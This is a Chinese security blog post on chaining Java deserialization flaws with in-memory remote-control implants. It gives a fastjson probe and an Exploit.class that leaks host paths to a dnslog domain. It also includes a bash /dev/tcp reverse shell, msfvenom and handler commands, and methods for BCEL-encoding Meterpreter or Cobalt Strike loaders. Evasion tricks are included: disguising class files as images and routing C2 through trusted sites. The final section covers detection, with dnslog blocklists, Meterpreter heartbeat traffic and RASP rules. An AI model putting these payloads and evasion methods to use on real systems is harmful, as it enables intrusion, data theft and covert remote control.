反序列化漏洞和远控的结合
牌桌
攻和防的挑战和应战是安全团队兴衰的核心力量,一个组织如果可成功应对挑战,那么技术能力就会提升起来,否则组织就会走向衰落和解体。Azimuth、Vupen这类创业公司的兴起代表着现有的复杂局势在于专业化的混合手段攻击、自动攻击、工具链集成。笔者注意到奇安信方面最近也提到了四化:
- 对手组织化,就是对手从普通的网络犯罪变成了组织化的攻击,攻击方式从通用攻击转向了专门定向攻击;
- 环境云化,新一代信息技术的全面应用,带来了信息化和信息系统的云化,典型特征是终端智能、应用系统、IT设施的全面云化;
- 目标数据化,新一代信息化建设以数据共享为基础,“数据”在经济社会中的价值越来越高,数据和业务应用成为网络攻击的重要目标;
- 防护实战化,面对新的安全形势和安全环境,安全防护体系建设从合规导向转向能力导向,网络安全防护和监管都转向关注实战化,实网攻防演习成为常态化手段。
整牌
要冷静—绝不要动作快—停下来想一想-这是执行渗透攻击的规则。如果件件遵守,就绝不会出乱子。回想下遇到反序列化漏洞时的日常操作:首先通过java的InetAddress判断是否是fastjson或jackson踩点。
{"@type":"java.net.InetAddress","val":"g.cn"}
确认后打POC,根据返回的java UA显示精心选择与服务器端JDK版本一致的class,通过RMI或者LDAP协议适配Exploit.class,首先回显dnslog返回确认是否利于成功,
public Exploit() throws Exception {StringBuffer sb = new StringBuffer(new File(".").getCanonicalPath());
sb.append(System.getenv("JAVA_HOME"));
String pwd = new BASE64Encoder().encode(sb.toString().getBytes());
pwd = pwd.replaceAll("\\n", "");
String domain = pwd + ".x1382.ceye.io";
try {
InetAddress ip = InetAddress.getByName(domain);
} catch (UnknownHostException e) {
// e.printStackTrace();
}}
确认存在漏洞执行第二遍POC,在win平台使用下powershell、dnscat2、regsvr32,linux下awk、管道、重定向等反弹shell方法获取权限。
public Exploit() throws Exception {
try {
Runtime r = Runtime.getRuntime();
// Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ip/port 0>&1"});
Process p = r.exec(new String[]{"open","/Applications/Calculator.app/"});
p.waitFor();
} catch (IOException e) {
e.printStackTrace();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
反序列化类技术利用不足
- NIDS:通过流量分析RMI、LDAP等协议,阻断请求;dns搜集ceye等其他已知的dnslog平台。拦截对外发出的直连socket请求。
- HIDS:查看java进程进行是否绑定/bin/bash shell;通过分析bash执行内容,感知是否是攻击性异常命令。
- 蜜罐:伪装bash,记录行为,捕获攻击者的具体行为和vps主机ip对应提交到到威胁情报。
- 目标应用程序版本发布升级会使得挂载的.class恶意脚本失效。
- 利用过程的条件
- RMI、ldap加载的问题在于java 8u121的trustURLCodebase默认关闭。
- 如果需要多次执行命令,需要更改Exploit里shell命令,再次触发利用多次fastjson等反序列化漏洞,利用成功时日志会有类似JSONException: set property error, autoCommit的错误信息,暴露攻击时间线,
- shell命令如which、ps -aux等命令容易被重点监控或替换。
- RASP:查看是否是反序列自动化工具生成的POC来执行的命令,如下面的图表所示。
if (method.startsWith('ysoserial.Pwner')) {
message = _("Reflected command execution - Using YsoSerial tool")
break
}
rasp也支持拦截对外访问地址。
'.ceye.io','.vcap.me','.xip.name','.xip.io', 'sslip.io','.nip.io', '.burpcollaborator.net', '.tu4.org'
思路
从http 协议入手 现在一般是通过rmi、ldap的手法从其他服务器上加载 class 文件来进行实例化,远程server端都是去下载.class文件,此类文件特征很明显的以字节码cafebabe开头。解决办法通过将该class通过maven打包为jar文件,然后变更jar文件的后缀即可。或者通过file:、raw协议直接加载载荷,避免网络端日志的发现。
public Class> loadClass(String className, String codebase)
throws ClassNotFoundException, MalformedURLException {ClassLoader parent = getContextClassLoader();
ClassLoader cl =
URLClassLoader.newInstance(getUrlArray(codebase), parent);
return loadClass(className, cl);
}
URLClassLoader是ClassLoader的子类,它用于从指向 JAR 文件和目录的 URL 的搜索路径加载类和资源核心,同传统的远端环境相比变更步骤为:修改LdapServer的codebase启用参数:
java LdapServer https://g.cn/2.jpg#Exploit 389
其中https://g.cn/2.jpg表示将class打包为jar后伪装的名字,Exploit为该jar里执行payload的类名。这样将RMI、LDAP的命名服务从远端下载的后缀和格式变得更隐蔽了些。
defineClass种马 有些反序列化漏洞支持classloader的将恶意class文件进行bcel编码,然后通过defineClass直接加载是个好办法,反序列化不只是rce,还有任何java代码执行的功能,具体的单Class功能实现考虑几种协议实现。
- http隧道
直接通过defineClass一键种马,一般情况下使用时jndi已经用到http协议。
- 白名单c2地址
采用的C2地址来自于微软、aws和oracle这里的可信官方站点,缺点是服务端升级、变更、撤离和定制上报内容时不是很方便。需要改进自己实现https的服务器端,通过Microsoft、Oracle站点的ssrf调用cloudflare的CDN联系后端远控下发命令。
- icmp隧道
java提供对raw socket的很有限的支持,要想实现icmp需要jpcap或者RockSaw Raw Socket Library辅助,目前没有任何实现的思路和方法,读者可以考虑通过调用其他jni工具实现。
- dns隧道
dnslog是最简单直接的利用方法,相关的姿势不再重复。
- smtp
smtp是个好办法,获取内部的zimbra或者exchange账户,走smtp协议附件规则转发,既可以进行文件传输,也不用担心心跳特征,网络一般也在IDC区域。当然首先你需要有一个邮箱账户。
- 切入点是Exploit.class的具体实现不再是rmi、ldap,而是直接加载class文件;
- 反序列化时手法精巧,避免报错显示;
- 避免反弹shell,而在这一步直接植入木马到内存中,原生JAVA编码来实现攻击者远控下发和victim所要执行的操作;
- 通信隧道方面走从https到可信的c2服务器站点,https、icmp协议、dns协议
如何达到这一点?
笔者在这里介绍了通过编码shellcode,结合bcel在反序列化时种马的技术,抛砖引玉为了共同探讨。相关代码地址为:https://github.com/nanolikeyou/R9000.git 该git项目下有几个java文件,分别用来:
MSFPayload.java:远程触发加载msf生成的远控meterpreter;CobaltStrike.java;记载cs和msf生成的shellcode到内存中;BCELEncode.java,将MSFPayload或CobaltStrike的class文件进行bcel编码,方便构造反序列化poc。
如果不需要使用bcel的方式,直接将生成的MSFPayload.class或者CobaltStrike.class作为rmi、ldap托管的JNDI类也可。
出牌:
Talk is cheap. Show me the code.MSFPayload的使用办法
首先使用进入msfconsole生成msf payload,提取 metasploit.dat里的远程地址,形如URL=https://8.8.8.8:443/7UPg239jNUwQgAEIKIRr45vljLb3wVQshFSxIEqz8aprtR_32bn7crmons7R3ihHKIPxbUlXUaqJmKQzPJvIyHR
msfvenom -p java/meterpreter/reverse_https LHOST=8.8 LPORT=4446 -f raw > https.jar
jar -xvf https.jar && tail metasploit.dat
服务器端进行监听
use exploits/multi/handler
set PAYLOAD java/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
exploit
文章图片
image-20190808193921016 填入MSFPayload,通过BCELEncode进行编码,打入反序列化poc,msf端获取shell。
CobaltStrike的使用方法
启动cs,使用attacks->packages->payload generator,生成java的shellcode,也支持填入msf生成的java类型的shellcode。
文章图片
image-20190808195201906
文章图片
image-20190808195413095 填入CobaltStrike.java,通过BCELEncode进行编码,打入反序列化poc,cs获取shell。
不足之处 今年3月份OceanLotus (APT32)的工具JEShell可能是基于DEP的考虑实现了从内存加载的CobaltStrike的shellcode,但是也给了我很大的启发。读者可能阅读到下面的代码使用jna技术加载的shellcode
static Kernel32 kernel32 = (Kernel32) Native.loadLibrary( Kernel32.class, W32APIOptions.UNICODE_OPTIONS );
但是很遗憾java和c的结合很难,本shellcode加载技术只适用于win32环境,而且需要目标环境下有jna这个jar包。也许安卓方面Dalvik的jit技术可以用在这里。另外可以将这些需要的jar和dll以字节流的方式记载,然后在服务器端释放,但是太不稳定了。
收牌 如何防护上面的攻击?不妨看下msf原理的实现。
msf支持这些方法
- java/jsp_shell_bind_tcp
- java/jsp_shell_reverse_tcp
- java/meterpreter/bind_tcp
- java/meterpreter/reverse_http
- java/meterpreter/reverse_https
- java/meterpreter/reverse_tcp
- java/shell/bind_tcp
- java/shell/reverse_tcp
- java/shell_reverse_tcp
那么以生成http.jar的载荷为例,靶机首先运行ava -jar http.jar作为下载器,实现内容为将自身添加到临时文件目录,从指定端口下载真实载荷文件
/Library/Java/JavaVirtualMachines/jdk1.8.0_162.jdk/Contents/Home/jre/bin/java -classpath /var/folders/1v/w11kfzss32578s936h30vdyr0000gn/T/~spawn7115543174041637947.tmp.dir metasploit.Payload
文章图片
image-20190805004106503 然后执行下载下来的真实class javapayload.stage.Meterpreter进行bootstrap,销毁源tmp文件,class以0000 00d3 cafe babe 开头(注意到这又是一个唯一特征)。这一步远程加载datastream,msf真实的payload开始执行,实现无文件内存存留。
心跳特征
文章图片
image-20190805004012139 com.metasploit.meterpreter.Meterpreter
心跳存活和下发命令通过post上传加密之后的内容,心跳地址固定,返回无回显。get地址为心跳,如果需要下发命令,则心跳地址返回内容包括需要下发的命令,然后通过post往该地址上报结果内容。
下面三个请求分别为一般心跳、下发命令,上报执行命令的回显。
GET /PChqVu5ecM04Fj222Ge1IEoebvxJdmRcVWyrLa/ HTTP/1.1
User-Agent: Java/1.8.0_162
Host: 3351:4445
Accept: text/html, image/gif, image/jpeg, *;
q=.2, */*;
q=.2
Connection: keep-aliveHTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: Keep-Alive
Server: Apache
Content-Length: 0GET /PChqVu5ecM022vxJdmRcVWyrLa/ HTTP/1.1
User-Agent: Java/1.8.0_162
Host: 33151:4445
Accept: text/html, image/gif, image/jpeg, *;
q=.2, */*;
q=.2
Connection: keep-aliveHTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: Keep-Alive
Server: Apache
Content-Length: 114[:X....$.........`9.[:X.[:X.[:X.[:X.[;
X.(N<.+S.."I..)U;
.(I..>N..)U;
.(I=.[:X.r:Y.Y
i.c a.n.l.o.k.l.j.m.i.b.j.j.h.m:POST /PChqVu5ecM04FjwH33339uUXqqrVOPEZLGe1IEoebvxJdmRcVWyrLa/ HTTP/1.1
User-Agent: Java/1.8.0_162
Host: 331:4445
Accept: text/html, image/gif, image/jpeg, *;
q=.2, */*;
q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 145038=....P..gQ....-7....=...=..m=...=..2=...N..zM..hD..kO..~N..|X..kO..~N..h=.......?..+...-.... ..-
......-...#...+....=...=...=...=...<;
.3W..EM;
.
...K....=...5 ..=...5
..=...=...9..tR...=...<..4N..u...nS...=...+......yT..w\..xU...=..[=...=...?...=...=...<..iR...=...=......i...rS..bN..|Y...=...5..nN..h_..4N..wR...=..i}...=...=...=..1=...=.. O..o=........
显然从ua、包内容的明显黑名单字段、http出口的黑白名单方面抓特征还是很容易上规则的。
至于反序列化等防护手段,根据企业的推行力度和运营手段斟酌吧。
最后 【反序列化漏洞和远控的结合】如何您有更好的实现和思路,欢迎同我留言交流。
推荐阅读
- CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
- 2018-02-06第三天|2018-02-06第三天 不能再了,反思到位就差改变
- 吃了早餐,反而容易饿(为什么?)
- 难道你仅会钻规则的漏洞吗()
- 父母越不讲道理,孩子反而越优秀!说的是你吗()
- 改变自己,先从自我反思开始
- leetcode|leetcode 92. 反转链表 II
- 那些反串过的艺人-最是美色如醉人
- 反脆弱性(工作越稳定,人生越脆弱!)
- 五一反思